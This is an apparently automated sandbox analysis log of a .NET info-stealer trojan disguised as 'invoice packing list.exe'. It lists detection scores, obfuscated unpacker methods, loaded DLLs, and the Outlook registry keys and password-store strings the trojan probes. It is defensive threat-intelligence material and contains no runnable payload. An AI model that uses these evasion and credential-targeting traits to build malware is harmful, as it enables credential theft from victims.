          Source: invoice packing list.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, BCWpgj8j50mWaxBvP6.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, BCWpgj8j50mWaxBvP6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, BCWpgj8j50mWaxBvP6.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, BCWpgj8j50mWaxBvP6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, F4Wcut0tUpQuiHlWmD.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, F4Wcut0tUpQuiHlWmD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, F4Wcut0tUpQuiHlWmD.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, F4Wcut0tUpQuiHlWmD.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, F4Wcut0tUpQuiHlWmD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, F4Wcut0tUpQuiHlWmD.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, BCWpgj8j50mWaxBvP6.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, BCWpgj8j50mWaxBvP6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, F4Wcut0tUpQuiHlWmD.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, F4Wcut0tUpQuiHlWmD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, F4Wcut0tUpQuiHlWmD.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@3/3
          Source: C:\Users\user\Desktop\invoice packing list.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice packing list.exe.logJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMutant created: NULL
          Source: invoice packing list.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: invoice packing list.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\invoice packing list.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000003206000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000324A000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003215000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003224000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4492388761.000000000405C000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003257000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: invoice packing list.exeReversingLabs: Detection: 59%
          Source: invoice packing list.exeVirustotal: Detection: 60%
          Source: unknownProcess created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: invoice packing list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: invoice packing list.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: invoice packing list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: IhJW.pdb source: invoice packing list.exe
          Source: Binary string: IhJW.pdbSHA256N source: invoice packing list.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, F4Wcut0tUpQuiHlWmD.cs.Net Code: J2WfKsWSxk System.Reflection.Assembly.Load(byte[])
          Source: 0.2.invoice packing list.exe.38a80a8.1.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, F4Wcut0tUpQuiHlWmD.cs.Net Code: J2WfKsWSxk System.Reflection.Assembly.Load(byte[])
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, F4Wcut0tUpQuiHlWmD.cs.Net Code: J2WfKsWSxk System.Reflection.Assembly.Load(byte[])
          Source: 0.2.invoice packing list.exe.52e0000.6.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_0270CE69 push es; iretd 0_2_0270CE76
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_02708EDD push ebx; iretd 0_2_02708EDF
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_0270CCE8 push cs; iretd 0_2_0270CCF6
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_0270CD40 push cs; iretd 0_2_0270CD4E
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_0270B370 push esp; iretd 0_2_0270B37F
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_02705338 pushfd ; iretd 0_2_02705342
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_02705871 pushfd ; iretd 0_2_02705876
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_0270590D pushfd ; iretd 0_2_02705916
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E22A11 pushfd ; iretd 0_2_04E22A12
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E294B8 pushad ; iretd 0_2_04E294C1
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E23458 pushad ; iretd 0_2_04E23466
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E29A38 pushad ; iretd 0_2_04E29A3D
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC7EF6 push es; ret 5_2_06BC7F4C
          Source: invoice packing list.exeStatic PE information: section name: .text entropy: 7.772898722324074
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, XZ1it8U9PwDjdP7gXi.csHigh entropy of concatenated method names: 'CRZGN9kx6J', 'R8CGA8OHXp', 'jrIGrlae60', 'RXNG5wq5YG', 'o1TSfLVHTNeDfVf3INo', 'DdiQ5KVinI0jkqm4hNH', 'o4Hd5lVrVvmPy7ZufF2', 'S1SUy7VZoEQpEtPX6qG'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, zSiLhA2jy2oTvl6tbs.csHigh entropy of concatenated method names: 'qUoKs99lB', 'LlMYYM6G6', 'vRNaVVKpb', 'yqv4ph6bv', 'Rjcj6Fs4x', 'FaLZ3H8h3', 'D5acoEfUKcP3Zg9E7G', 't1HSwl05RVYmIyjq7K', 'DLrBAS1PT', 'mlPVHZ8qx'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, UCgCHyZk2L11G2cjVp.csHigh entropy of concatenated method names: 'IthPW1xAmO', 'CmNP4IdRdG', 'sYKmlv6yOI', 'gyXmeep86u', 'kIqmCsIcwY', 'pEQmSTySWH', 'RKemDldfUQ', 'Lytmu4i1xB', 'M8LmRFqoQP', 'EJsm3bIT70'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, khg9ERRp3gHWVtiDLt.csHigh entropy of concatenated method names: 'NSKkLdn3E7', 'wkWk9yoRFD', 'pGvkKvEnjv', 'lUskYg6uwV', 'wNVkWgWdOx', 'pu9ka3hNQQ', 'afYk4EnTMT', 'gj7k8sGyr7', 'h9ikjAG620', 'GubkZajCWr'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, RGlWmwje7LtvZq0b4l.csHigh entropy of concatenated method names: 'Oi5mY96SWr', 'co5ma2uxTa', 'rxAm8otwLu', 'DHwmjEe7dj', 'zV6mGd0yP9', 'viHmTFhVaJ', 'n2JmxhU7jj', 'QuUmBqaI5q', 'LtZmhiYiO7', 'fV2mVNZF1k'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, DvPB97fbEbk6oqcSaO.csHigh entropy of concatenated method names: 'niWIkCWpgj', 'E50I0mWaxB', 'Ue7IELtvZq', 'kb4IvloCgC', 'bcjIGVpKeC', 'Cy8ITqdFGi', 'VZR9gm3M9o7xsHgeRQ', 'fFOOQ8NZcDkEOEDiV9', 'p4bIIJmaHs', 'ylMIywI9yG'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, j1gFGoXv2S6nIHvGHT.csHigh entropy of concatenated method names: 'ToString', 'NTtT7NW4tR', 'iGqTnMg16J', 'YQJTl5AaeT', 'f26TeMjAkL', 'IT8TCEK5nK', 'FpETSY3k8Q', 'AwWTDGMUdi', 'FnZTuoOF2Z', 'd0bTRJgv1P'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, a284xdII5yLBtRLk15W.csHigh entropy of concatenated method names: 'Bb7V5FjYke', 'a8XVzvPDMl', 'kiPcOsNUNr', 'IaHcIjUPGf', 'J0Ic2Gu9F6', 'Gpacy8EMeC', 'DoZcf6nloe', 'APccbfPfLw', 'nZYcHit2wM', 'bPvcQjhvcR'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, xoB6256fyHcwTsGSFY.csHigh entropy of concatenated method names: 'AewF8cr0yT', 'xpTFjpdHTW', 'desFqD70b7', 'TnbFnBfbFT', 'luVFeyr7sF', 'gOYFCTQctY', 'u0wFDg1BCR', 'oKkFuZUBln', 'mUxF3ybs0I', 'ieQF73tp99'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, Q95703IO9rX5a8MElxl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'maRV7BOeyn', 'R8TVtuy3as', 'RtHV6Ey4GS', 'LEYVJiM15u', 'yorVULmkZY', 'JbZVXBR2nD', 'Wy4V1iebwv'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, F4Wcut0tUpQuiHlWmD.csHigh entropy of concatenated method names: 'b51ybtIs57', 'IZ9yHXjGXC', 'H5gyQmo4LD', 'MBjymjhdjO', 'IPoyPtwryf', 'qaQyM9eeb6', 'xWcykCP1qW', 'ER0y0EOZLQ', 'KJIyglWeL8', 'Ct7yERpdAy'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, zeC4y8qqdFGihnfe7F.csHigh entropy of concatenated method names: 'AVHMbfJXTp', 'zK9MQORnWo', 'aHPMPRwGin', 'BikMkfAaY3', 'D8gM0uFn6k', 'GwEPoXog5n', 'EaRPwxqhYg', 'QEgPNngK8W', 'gcqPAXGRKM', 'Df1Pr6IySE'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, WW3P9p5VnJt57g3Q1E.csHigh entropy of concatenated method names: 'do9VmVJewj', 'j7EVP5eGp5', 'cKYVMNqiCv', 'kqbVkPd1SV', 'yIHVhEriNh', 'TpDV0KhjWu', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, EyMo88rs0Ara9Txj0w.csHigh entropy of concatenated method names: 'PKShqKRLin', 'yk2hnAJltv', 'jdfhlVUD9w', 'oi4heHIGMi', 'stfhCDbg1m', 'YTghSELsZN', 'eMihDwpFDW', 'FeRhu21r2D', 'LSxhRsdb1W', 'Aggh3L4sEG'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, Ud9QceN44K6Mw96FA1.csHigh entropy of concatenated method names: 'NPBhGFOeiI', 'b0Rhx7rZJ7', 'DUOhhZnxZO', 'WjshcQuA0b', 'DDshp6LfX6', 'qTDhiNfcK5', 'Dispose', 'bDVBHpkZeg', 'OotBQLP8Bv', 'f01BmQCl9e'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, dD0BVxQqWcHNl3EOSs.csHigh entropy of concatenated method names: 'Dispose', 'z6MIrw96FA', 'NWF2nsD7GB', 'wcJRF1gXwW', 'ToCI5PDimL', 'ca6IzdYJs2', 'ProcessDialogKey', 'L9j2OyMo88', 'w0A2Ira9Tx', 'E0w22AW3P9'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, u65AEyzuvTaiVXsVTe.csHigh entropy of concatenated method names: 'fDJVacQVCI', 'ckUV8vOMvo', 'WseVjpQcCv', 'mTBVqPQMDZ', 'Xw3VnjkjAq', 'ydHVePgxTu', 'tlJVCl2M73', 'thWViC8NHL', 'qPXVLotb1J', 'LeKV9ZoyXV'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, FR0QiRIfhQaCC6ovHDv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fdpdh70MZR', 'k57dVL3dnn', 'z3adchBEu9', 'yDpddLYDXs', 'bfWdptaqj2', 'wBhdsdJy5S', 'VPXdiVxOGa'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, DS7BW0DFsb2tsRZAL8.csHigh entropy of concatenated method names: 'R96kHMshJB', 'lCUkmfLuc0', 'WYpkMfrhiW', 'hO6M5esJym', 'bAhMzeG4Gd', 'vv8kOYAvk3', 'bNYkIHi8vw', 'rllk28Ih9u', 'QYYkyB64au', 'DMskfQUrlU'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, BCWpgj8j50mWaxBvP6.csHigh entropy of concatenated method names: 'fcqQJ0xSkG', 'oAaQUWrGSX', 'eeKQX0YeEU', 'CwrQ1Ayhuf', 'Jc3QoP5WVj', 'OZZQwUWl6V', 'TLCQN7epej', 'jpaQAoNuxi', 'FX0QrWAqH6', 'gPtQ5JRLlS'
          Source: 0.2.invoice packing list.exe.2620000.0.raw.unpack, sw2xZcJUwW7c0RvEVa.csHigh entropy of concatenated method names: 'FYRG3lU5I5', 'wVCGt2G5dp', 'NVmGJo30i9', 'kqSGUSgt0k', 'B4JGntLB34', 'bTLGlbkeha', 'n1pGeJed8O', 'IuAGCugQB9', 'FEOGS5Y9hn', 'm1gGD8nZYJ'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, XZ1it8U9PwDjdP7gXi.csHigh entropy of concatenated method names: 'CRZGN9kx6J', 'R8CGA8OHXp', 'jrIGrlae60', 'RXNG5wq5YG', 'o1TSfLVHTNeDfVf3INo', 'DdiQ5KVinI0jkqm4hNH', 'o4Hd5lVrVvmPy7ZufF2', 'S1SUy7VZoEQpEtPX6qG'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, zSiLhA2jy2oTvl6tbs.csHigh entropy of concatenated method names: 'qUoKs99lB', 'LlMYYM6G6', 'vRNaVVKpb', 'yqv4ph6bv', 'Rjcj6Fs4x', 'FaLZ3H8h3', 'D5acoEfUKcP3Zg9E7G', 't1HSwl05RVYmIyjq7K', 'DLrBAS1PT', 'mlPVHZ8qx'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, UCgCHyZk2L11G2cjVp.csHigh entropy of concatenated method names: 'IthPW1xAmO', 'CmNP4IdRdG', 'sYKmlv6yOI', 'gyXmeep86u', 'kIqmCsIcwY', 'pEQmSTySWH', 'RKemDldfUQ', 'Lytmu4i1xB', 'M8LmRFqoQP', 'EJsm3bIT70'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, khg9ERRp3gHWVtiDLt.csHigh entropy of concatenated method names: 'NSKkLdn3E7', 'wkWk9yoRFD', 'pGvkKvEnjv', 'lUskYg6uwV', 'wNVkWgWdOx', 'pu9ka3hNQQ', 'afYk4EnTMT', 'gj7k8sGyr7', 'h9ikjAG620', 'GubkZajCWr'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, RGlWmwje7LtvZq0b4l.csHigh entropy of concatenated method names: 'Oi5mY96SWr', 'co5ma2uxTa', 'rxAm8otwLu', 'DHwmjEe7dj', 'zV6mGd0yP9', 'viHmTFhVaJ', 'n2JmxhU7jj', 'QuUmBqaI5q', 'LtZmhiYiO7', 'fV2mVNZF1k'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, DvPB97fbEbk6oqcSaO.csHigh entropy of concatenated method names: 'niWIkCWpgj', 'E50I0mWaxB', 'Ue7IELtvZq', 'kb4IvloCgC', 'bcjIGVpKeC', 'Cy8ITqdFGi', 'VZR9gm3M9o7xsHgeRQ', 'fFOOQ8NZcDkEOEDiV9', 'p4bIIJmaHs', 'ylMIywI9yG'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, j1gFGoXv2S6nIHvGHT.csHigh entropy of concatenated method names: 'ToString', 'NTtT7NW4tR', 'iGqTnMg16J', 'YQJTl5AaeT', 'f26TeMjAkL', 'IT8TCEK5nK', 'FpETSY3k8Q', 'AwWTDGMUdi', 'FnZTuoOF2Z', 'd0bTRJgv1P'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, a284xdII5yLBtRLk15W.csHigh entropy of concatenated method names: 'Bb7V5FjYke', 'a8XVzvPDMl', 'kiPcOsNUNr', 'IaHcIjUPGf', 'J0Ic2Gu9F6', 'Gpacy8EMeC', 'DoZcf6nloe', 'APccbfPfLw', 'nZYcHit2wM', 'bPvcQjhvcR'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, xoB6256fyHcwTsGSFY.csHigh entropy of concatenated method names: 'AewF8cr0yT', 'xpTFjpdHTW', 'desFqD70b7', 'TnbFnBfbFT', 'luVFeyr7sF', 'gOYFCTQctY', 'u0wFDg1BCR', 'oKkFuZUBln', 'mUxF3ybs0I', 'ieQF73tp99'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, Q95703IO9rX5a8MElxl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'maRV7BOeyn', 'R8TVtuy3as', 'RtHV6Ey4GS', 'LEYVJiM15u', 'yorVULmkZY', 'JbZVXBR2nD', 'Wy4V1iebwv'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, F4Wcut0tUpQuiHlWmD.csHigh entropy of concatenated method names: 'b51ybtIs57', 'IZ9yHXjGXC', 'H5gyQmo4LD', 'MBjymjhdjO', 'IPoyPtwryf', 'qaQyM9eeb6', 'xWcykCP1qW', 'ER0y0EOZLQ', 'KJIyglWeL8', 'Ct7yERpdAy'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, zeC4y8qqdFGihnfe7F.csHigh entropy of concatenated method names: 'AVHMbfJXTp', 'zK9MQORnWo', 'aHPMPRwGin', 'BikMkfAaY3', 'D8gM0uFn6k', 'GwEPoXog5n', 'EaRPwxqhYg', 'QEgPNngK8W', 'gcqPAXGRKM', 'Df1Pr6IySE'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, WW3P9p5VnJt57g3Q1E.csHigh entropy of concatenated method names: 'do9VmVJewj', 'j7EVP5eGp5', 'cKYVMNqiCv', 'kqbVkPd1SV', 'yIHVhEriNh', 'TpDV0KhjWu', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, EyMo88rs0Ara9Txj0w.csHigh entropy of concatenated method names: 'PKShqKRLin', 'yk2hnAJltv', 'jdfhlVUD9w', 'oi4heHIGMi', 'stfhCDbg1m', 'YTghSELsZN', 'eMihDwpFDW', 'FeRhu21r2D', 'LSxhRsdb1W', 'Aggh3L4sEG'
